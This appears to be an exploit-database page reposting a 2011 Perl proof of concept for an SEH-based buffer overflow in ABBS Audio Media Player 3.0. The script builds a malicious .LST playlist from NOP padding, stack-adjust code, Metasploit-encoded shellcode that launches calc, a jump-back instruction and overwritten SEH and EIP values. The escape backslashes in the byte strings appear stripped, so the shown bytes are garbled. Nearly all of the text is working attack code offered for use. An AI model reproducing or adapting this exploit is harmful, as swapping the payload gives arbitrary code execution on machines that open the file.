Home / exploits ABBS Audio Media Player 3.0 .LST Buffer Overflow
Posted on 15 March 2011
# Exploit Title: ABBS Audio Media Player Buffer Overflow Exploit (SEH) # Software Link: http://abbs.qsnx.net/downloads/abbs-amp.zip # Version: 3.0 # Tested on: Win XP SP3 French # Date: 14/03/2011 # Author: h1ch4m # Email: h1ch4m@live.fr # Home: http://net-effects.blogspot.com my $file= "exploit.lst"; my $size = 4108; # make a room for our shellcode my $stack = "xb8xffxefxffxff" . # mov eax, 0xffffefff "xf7xd0" . # not eax "x29xc4"; # sub esp, eax # windows/exec - 223 bytes # http://www.metasploit.com # Encoder: x86/shikata_ga_nai # EXITFUNC=seh, CMD=calc my $shellcode = "xbfxa0x03xb5xf2x33xc9xb1x32xdbxdfxd9x74x24" . "xf4x5ax31x7ax0ex03x7ax0ex83x62x07x57x07x9e" . "xe0x1exe8x5exf1x40x60xbbxc0x52x16xc8x71x63" . "x5cx9cx79x08x30x34x09x7cx9dx3bxbaxcbxfbx72" . "x3bxfaxc3xd8xffx9cxbfx22x2cx7fx81xedx21x7e" . "xc6x13xc9xd2x9fx58x78xc3x94x1cx41xe2x7ax2b" . "xf9x9cxffxebx8ex16x01x3bx3ex2cx49xa3x34x6a" . "x6axd2x99x68x56x9dx96x5bx2cx1cx7fx92xcdx2f" . "xbfx79xf0x80x32x83x34x26xadxf6x4ex55x50x01" . "x95x24x8ex84x08x8ex45x3exe9x2fx89xd9x7ax23" . "x66xadx25x27x79x62x5ex53xf2x85xb1xd2x40xa2" . "x15xbfx13xcbx0cx65xf5xf4x4fxc1xaax50x1bxe3" . "xbfxe3x46x69x41x61xfdxd4x41x79xfex76x2ax48" . "x75x19x2dx55x5cx5excfxa4x6dx4ax58x1fx04x37" . "x04xa0xf2x7bx31x23xf7x03xc6x3bx72x06x82xfb" . "x6ex7ax9bx69x91x29x9cxbbxf2xacx0ex27xf5"; my $jump = "xe9x13xffxffxff"; # jump back 237 bytes my $eip = pack('V', 0x7c86467b); # jmp esp my $nseh = "xebxf5xffxff"; my $seh = pack('V', 0x00407434); my $junk = "x90" x ($size-length($stack.$shellcode.$jump)); open($FILE,">$file"); print $FILE $junk.$stack.$shellcode.$jump.$eip.$nseh.$seh; close($FILE); print "Files Created successfully "; sleep(1);
